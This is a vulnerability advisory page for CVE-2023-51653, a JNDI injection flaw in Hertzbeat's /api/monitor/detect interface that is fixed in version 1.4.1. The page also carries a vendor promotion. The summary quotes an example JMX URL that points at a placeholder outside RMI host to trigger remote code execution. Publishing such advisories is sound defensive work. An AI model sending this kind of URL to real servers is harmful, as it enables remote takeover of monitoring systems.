CVE-2023-51653

CVSS 3.1 Score 9.8 of 10 (high)

Details

Published Feb 22, 2024

CWE ID 74

Summary

CVE-2023-51653 is a newly discovered vulnerability affecting the real-time monitoring system, Hertzbeat. The issue lies in the `JmxCollectImpl.java` implementation of `JMXConnectorFactory.connect`. This vulnerability is characterized as JNDI injection, specifically taking place at the `/api/monitor/detect` interface. When a URL field is present, the default address is utilized, making it susceptible to attacks. If the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, an attacker can trigger remote code execution. Version 1.4.1 contains a patch to remedy this vulnerability.

Prevent cyber attacks with Recorded Future by prioritizing and patching critical vulnerabilities being exploited by threat actors targeting your industry. Book your demo to learn more.

https://app.recordedfuture.com/live/sc/entity/t34vWR
https://www.cve.org/CVERecord?id=CVE-2023-51653
https://nvd.nist.gov/vuln/detail/CVE-2023-51653

Back to Vulnerability Database

CVE-2023-51653

CVSS 3.1 Score 9.8 of 10 (high)

Details

Summary

Advisories, Assessments, and Mitigations